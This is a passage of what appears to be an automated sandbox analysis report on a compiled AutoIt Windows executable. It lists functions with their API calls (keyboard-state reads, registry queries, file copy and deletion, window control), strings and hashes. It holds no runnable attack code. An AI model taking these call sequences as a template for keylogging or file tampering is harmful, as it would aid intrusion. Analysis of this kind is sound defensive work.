                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                      • API String ID: 1411258926-22481851
                                                                                                                                                                                      • Opcode ID: 1a68a6ad5da817bedbcdae39497dd08b22d8bb929388b7c92fbc27ab610aa7b2
                                                                                                                                                                                      • Instruction ID: d978d9e3fcd01138f02c9ed6ea641a7adac9ef83a0132107a992e2edae21af8f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a68a6ad5da817bedbcdae39497dd08b22d8bb929388b7c92fbc27ab610aa7b2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 05411576C11229AFDB15EBA4DC85EEEB7B8FF54714F004129E911A32A0EB709E04CF91
                                                                                                                                                                                      Function 00963AF7 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00962AA6,?,?), ref: 00963B0E
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                                      • API String ID: 3964851224-909552448
                                                                                                                                                                                      • Opcode ID: 8082e6b6644c15d8e2bdab6c785e47124d34598079d9570bd201ba5923e13c27
                                                                                                                                                                                      • Instruction ID: f5e6584a67b2f362e0a2277474f89b832eda5a99a669b9fc44d673465487d73f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8082e6b6644c15d8e2bdab6c785e47124d34598079d9570bd201ba5923e13c27
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C41C03020034E8BDF14EF14D951BEA3365AF95360F148868FC921B296DB749E5ADB60
                                                                                                                                                                                      Function 009483D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00907E53: _memmove.LIBCMT ref: 00907EB9
                                                                                                                                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0094843F
                                                                                                                                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00948455
                                                                                                                                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00948466
                                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00948478
                                                                                                                                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00948489
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: SendString$_memmove
                                                                                                                                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                      • API String ID: 2279737902-1007645807
                                                                                                                                                                                      • Opcode ID: d4d2f827e21f464d056b1d5e810d7978158a3f7f046204a76e58338682a3ddfb
                                                                                                                                                                                      • Instruction ID: c91d04c2b5025d0c4092b55ff534299a59bad4e64c476897bd757cb4d6445da4
                                                                                                                                                                                      • Opcode Fuzzy Hash: d4d2f827e21f464d056b1d5e810d7978158a3f7f046204a76e58338682a3ddfb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6411C1A1A4026D7DD710E7A1CC4AEFF7B7CEBD1B54F004829B411A20D0DEB05A05C6B1
                                                                                                                                                                                      Function 00948097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • timeGetTime.WINMM ref: 0094809C
                                                                                                                                                                                        • Part of subcall function 0091E3A5: timeGetTime.WINMM(?,75C0B400,00976163), ref: 0091E3A9
                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 009480C8
                                                                                                                                                                                      • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 009480EC
                                                                                                                                                                                      • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 0094810E
                                                                                                                                                                                      • SetActiveWindow.USER32 ref: 0094812D
                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0094813B
                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0094815A
                                                                                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 00948165
                                                                                                                                                                                      • IsWindow.USER32 ref: 00948171
                                                                                                                                                                                      • EndDialog.USER32(00000000), ref: 00948182
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                      • String ID: BUTTON
                                                                                                                                                                                      • API String ID: 1194449130-3405671355
                                                                                                                                                                                      • Opcode ID: ba56ae7e21b63099113fa4bcac81dc53a2b4df1d6b0f5ba70f272925cc33453a
                                                                                                                                                                                      • Instruction ID: 1a563390bd4db21e9f24a85b21af34093e413581ba10ec9c2994f3349d1f5123
                                                                                                                                                                                      • Opcode Fuzzy Hash: ba56ae7e21b63099113fa4bcac81dc53a2b4df1d6b0f5ba70f272925cc33453a
                                                                                                                                                                                      • Instruction Fuzzy Hash: AB21AEB072C204BFE7266B61EC89F6B7B6AFB443C9B048116F511822B1CF724D06BB11
                                                                                                                                                                                      Function 009432B0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00973C64,00000010,00000000,Bad directive syntax error,0099DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 009432D1
                                                                                                                                                                                      • LoadStringW.USER32(00000000,?,00973C64,00000010), ref: 009432D8
                                                                                                                                                                                        • Part of subcall function 0090CAEE: _memmove.LIBCMT ref: 0090CB2F
                                                                                                                                                                                      • _wprintf.LIBCMT ref: 00943309
                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0094332B
                                                                                                                                                                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00943395
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                      • API String ID: 1506413516-4153970271
                                                                                                                                                                                      • Opcode ID: 0f9ee3776352946a3dbf50ae4ae8ff4fc4ddf12de834e1866500a537c2a51db8
                                                                                                                                                                                      • Instruction ID: 645ebc0748d8a6e222ff521febca37130db592fe330f0fac44599bd7bb525a41
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f9ee3776352946a3dbf50ae4ae8ff4fc4ddf12de834e1866500a537c2a51db8
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D219C3184421AFFDF01EF90CC0AFEE7779BF64704F408456B515A10E1EA72AA58DB60
                                                                                                                                                                                      Function 0094C890 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0094C6A0: __time64.LIBCMT ref: 0094C6AA
                                                                                                                                                                                        • Part of subcall function 009041A7: _fseek.LIBCMT ref: 009041BF
                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 0094C96F
                                                                                                                                                                                        • Part of subcall function 0092297D: __wsplitpath_helper.LIBCMT ref: 009229BD
                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 0094C982
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0094C995
                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 0094C9BA
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0094C9D0
                                                                                                                                                                                      • _wcscat.LIBCMT ref: 0094C9E3
                                                                                                                                                                                        • Part of subcall function 0094C6E4: _memmove.LIBCMT ref: 0094C71D
                                                                                                                                                                                        • Part of subcall function 0094C6E4: _memmove.LIBCMT ref: 0094C72C
                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0094C92A
                                                                                                                                                                                        • Part of subcall function 0094CE59: _wcscmp.LIBCMT ref: 0094CF49
                                                                                                                                                                                        • Part of subcall function 0094CE59: _wcscmp.LIBCMT ref: 0094CF5C
                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0094CB8D
                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0094CC24
                                                                                                                                                                                      • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0094CC3A
                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0094CC4B
                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0094CC5D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 152968663-0
                                                                                                                                                                                      • Opcode ID: 3d0d1c86223da6d8dfa127b9284fb0a5b88ef526a7eb0155149366444bcde0e5
                                                                                                                                                                                      • Instruction ID: 8e4503bf1cf61685129b8be6043bc41087dc985fd1b1db712f1a728a57362533
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d0d1c86223da6d8dfa127b9284fb0a5b88ef526a7eb0155149366444bcde0e5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 02C139F1901129AECF54DFA5DC81FEEB7BDAF99310F0040AAB609E6151DB709A84CF61
                                                                                                                                                                                      Function 009508D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3566271842-0
                                                                                                                                                                                      • Opcode ID: 7f4e64b17bfb35ed98b242c0d4f62763f6e3767ab4ecbe43b73bd9755b9be71b
                                                                                                                                                                                      • Instruction ID: d1ba4a95d0041ae0b2db051d9e504e85b48b3f84f1c9e14c42a41231475bb93d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f4e64b17bfb35ed98b242c0d4f62763f6e3767ab4ecbe43b73bd9755b9be71b
                                                                                                                                                                                      • Instruction Fuzzy Hash: EE712E75A01219AFDB10DFA5D888ADEB7B8FF88314F048495E909EB261D730EE44CF90
                                                                                                                                                                                      Function 0094388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00943908
                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00943973
                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00943993
                                                                                                                                                                                      • GetKeyState.USER32(000000A0), ref: 009439AA
                                                                                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 009439D9
                                                                                                                                                                                      • GetKeyState.USER32(000000A1), ref: 009439EA
                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00943A16
                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 00943A24
                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00943A4D
                                                                                                                                                                                      • GetKeyState.USER32(00000012), ref: 00943A5B
                                                                                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00943A84
                                                                                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00943A92
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 541375521-0
                                                                                                                                                                                      • Opcode ID: 0257fad49fc494430fece4f40b94cc2074fc0168cce5fa76d7db5ceebab656b0
                                                                                                                                                                                      • Instruction ID: 1276a023155ab8f137db6efc7c690e964808db99ead0e41241d4fcf63ada0d08
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0257fad49fc494430fece4f40b94cc2074fc0168cce5fa76d7db5ceebab656b0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A519830A0478469FB35EBB48811FEAFFF85F11344F08C59AD5C2562C2DA549B8CCB61
                                                                                                                                                                                      Function 0093FAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 0093FB19
                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0093FB2B
                                                                                                                                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0093FB89
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 0093FB94
                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0093FBA6
                                                                                                                                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0093FBFC
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0093FC0A
                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0093FC1B
                                                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0093FC5E
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0093FC6C
                                                                                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0093FC89
                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0093FC96
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3096461208-0
                                                                                                                                                                                      • Opcode ID: 6e589a94c5f3422da8ee27a6a7f4ca3636505b165674902f480f48754ab07fdf
                                                                                                                                                                                      • Instruction ID: 8cdd3df44c445ebee330d5a89ee731bd7528c790ff3bfeb931f0f3bb896e55c3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e589a94c5f3422da8ee27a6a7f4ca3636505b165674902f480f48754ab07fdf
                                                                                                                                                                                      • Instruction Fuzzy Hash: CC51F071B10209AFDB18DF69DD95AAEBBBAEB88710F148129F919D72D4D7709D008B10
                                                                                                                                                                                      Function 0091B86E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 009049CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00904954,00000000), ref: 00904A23
                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0091B85B), ref: 0091B926
                                                                                                                                                                                      • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0091B85B,00000000,?,?,0091AF1E,?,?), ref: 0091B9BD
                                                                                                                                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 0097E775
                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0091B85B,00000000,?,?,0091AF1E,?,?), ref: 0097E7A6
                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0091B85B,00000000,?,?,0091AF1E,?,?), ref: 0097E7BD
                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0091B85B,00000000,?,?,0091AF1E,?,?), ref: 0097E7D9
                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0097E7EB
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 641708696-0
                                                                                                                                                                                      • Opcode ID: 349ebc6c380dda525dbbf9dd6fecd09a794d4dd8fa8c36d024c1f02ac246ae8e
                                                                                                                                                                                      • Instruction ID: dbe0316b136fb9830bbb0966425650d3061ce5b580f8e9f228351a526de7b09d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 349ebc6c380dda525dbbf9dd6fecd09a794d4dd8fa8c36d024c1f02ac246ae8e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0761EF31618709CFDB36AF25C888BA5B7FAFF4A315F10451DE18A866B0C730A8C1EB44
                                                                                                                                                                                      Function 0091B039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0091B155: GetWindowLongW.USER32(?,000000EB), ref: 0091B166
                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0091B067
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ColorLongWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 259745315-0
                                                                                                                                                                                      • Opcode ID: 2de84e34a3115cfb5ebc0ad6831d8e17db537120ca0d1b55bc2fbf45dd2015c5
                                                                                                                                                                                      • Instruction ID: 3d35dee4dc4f797c6308d968c3669faabafa72a5e59156d2a32140d2a4bab712
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2de84e34a3115cfb5ebc0ad6831d8e17db537120ca0d1b55bc2fbf45dd2015c5
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3241C631208104AFDB245F28DC98BFA376BAF4A730F144265FD758A2E5D7308C81DB62
                                                                                                                                                                                      Function 00947334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 136442275-0
                                                                                                                                                                                      • Opcode ID: f97e6d6856a652ec04853cf5f7e4c2cb07b2d961c4d56a5c386a158de24bb776
